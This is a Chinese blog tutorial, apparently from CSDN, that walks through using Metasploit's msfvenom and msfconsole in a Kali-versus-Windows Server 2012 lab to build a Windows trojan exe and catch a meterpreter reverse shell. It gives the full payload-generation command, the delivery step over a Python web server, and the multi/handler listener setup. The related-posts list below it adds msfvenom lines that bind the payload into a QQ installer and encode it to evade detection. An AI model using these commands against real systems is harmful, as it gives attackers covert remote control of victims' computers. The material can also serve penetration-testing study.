msfconsole之制作windows木马并成功获取shell

已于 2022-11-22 13:52:31 修改
阅读量3.5k 收藏 17
点赞数 2
文章标签: 安全 linux centos 网络安全 web安全
于 2022-11-22 13:51:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56228347/article/details/127980946
版权

msfconsole之制作windows木马并成功获取shell


一、工具简介
    msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一个一体化的集中控制台,通过msfconsole,你可以访问和使用所有的metaslopit插件,payload,利用模块,post模块等等。msfconsole还有第三方程序的接口,比如nmap、sqlmap等,可以直接在msfconsole里面使用。

二、复现过程
    攻击机:kali-2021-09 IP地址:192.168.227.128
    靶机:windows12-server IP地址:192.168.227.131

(1)首先打开kali终端,输入msfconsole进入msf:
在这里插入图片描述

(2)通过msfvenom生成可以在windows系统运行的exe后缀病毒:
    msfvenom -p windows/meterpreter_reverse_tcp LHOST=vps ip LPORT=12345 -f exe > win2012.exe
在这里插入图片描述

(3)在kali上利用python开启一个8080服务,将exe文件传到靶机上:(此处不做演示)
在这里插入图片描述

(4)然后回到kali机上,需要开启端口监听,先使用监听模块:Use exploit/multi/handler
在这里插入图片描述

(5)然后设置payload反弹:Set payload windows/meterpreter_reverse_tcp
在这里插入图片描述

(6)通过show options看看需要设置哪些攻击参数,required中显示为yes的则是必须设置的参数:
在这里插入图片描述
    此处需要设置监听ip和端口号,通过以下命令行:
    set LHOST 192.168.227.128(攻击者终端ip)
    set LPORT 12345(攻击者终端监听的端口)
在这里插入图片描述

(7)然后输入exploit/run开始监听:
在这里插入图片描述
    回到windows2012中,点击win2012.exe运行此木马,此时kali可以成功收到shell,进入meterpreter:
在这里插入图片描述
    此时输入shell即可进入shell控制台模式,但是我们会发现编码问题导致显示出问题:
在这里插入图片描述
    输入chcp 65001即可解决编码错误问题,显示正常:
在这里插入图片描述

网工沉破鱼
关注
  • 2
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全MSF生成木马教程
一直被模仿,从未被超越
03-13 1266
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
msf制作简单的windows exe木马
weixin_73942557的博客
10-25 689
msf制作Windows可执行程序木马并利用。首先利用用组件msfvenom制作木马。然后将生成的木马放到你准备的靶机上面。设置payload、监听IP和端口。在靶机上运行生成的木马文件。进入msfconsole。-p设置payload。然后设置返回IP和端口。-f设置生成木马的类型。使用exploit利用。-o设置路径和文件名。目前就已经提权成功了。
如何使用kali中msfconsole软件生成木马shell和meterpreter类型)投放至本机进行控制???超级详细!!!
2301_77578012的博客
05-05 508
msf的使用
metasploit中msfconsole使用教程,永恒之蓝漏洞复现
qq_47289634的博客
03-13 2177
msfconsole是metasploit中的一个工具,msfconsole集成了很多漏洞的利用的脚本,永恒之蓝是在 Windows 发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
msf使用方法
weixin_47679436的博客
05-16 309
msf使用
MSF基于JAVA的漏洞获取shell实战
永远是少年
06-13 697
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF基于JAVA的漏洞获取shell实战。 一、环境准备 二、MSF设置 三、效果检验
55.Windows漏洞利用之构建ROP链绕过DEP并获取Shell1
08-03
本文主要介绍了如何在Windows环境中利用漏洞,尤其是针对DEP(Data Execution Prevention)堆栈执行保护机制,通过构建ROP(Return-Oriented Programming)链来绕过防御,并最终获取Shell。以下是对文章内容的详细...
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
" 这句话强调了这个Windows版本的MSFconsole在资源获取上可能较为困难,表明它对于渗透测试者和安全研究人员来说是一个宝贵的工具。 **标签解析:** - **渗透测试**:渗透测试是一种安全评估方法,通过模拟黑客攻击...
msfconsole讲解.pptx
09-27
hack -msf 木马生成精讲,PPT MSF全称msfconsoleMsfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。 MSF有免费和收费两种版本...
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
最新发布
05-10
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
msfconsole
12-12
kail、ubantu的msfconsole平台的用法,如search导入,use调用等等
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
简介
04-30 2698
我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。提示:以下是本篇文章正文内容,下面案例可供参考本文就是讲解远程控制并执行文件。
msf木马程序
热门推荐
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
09-15 1万+
捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个QQ 把它上传到了root/dy/路径下 然后开始捆绑 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe -p:指定后面的pa
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 8651
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
简单的木马制作并且运用
m0_46317658的博客
01-13 4964
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序并在目标主机上执行在本地监听上线。 实验环境:kali和windows7 在kali终端中进行: 一: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/h
怎么做一个木马
wuli1024的博客
01-27 2611
木马恶意软件,打开时似乎是用户打开的合法文件,例如打开图像或文档或播放媒体文件,但在后台,它会运行一些邪恶的进程,例如有人可能通过后门或注入一些其他有害代码。
msfconsole的简单使用
m0_53603468的博客
12-30 8545
文章目录前言一、入侵步骤二、msfconsole常用命令总结 前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsolemsfwebmsfupdate。msfupdate用于软件更新,建议使用前先进行更新,可以更新最新的漏洞库和利用代码。msfconsole 是整个框架中最受欢迎的模块,个人感觉也是功能强大的模块,所有的功能都可以该模块下运行。msfweb 是Metasploit framew.
53.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell1
08-03
本文是一篇关于网络安全Windows漏洞利用教程,主要讲解了如何利用Metasploit框架进行栈溢出攻击和实现反弹shell,目标是Windows XP系统。作者在文章中分享了其自学过程中的实践操作,强调了合法学习和安全意识的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值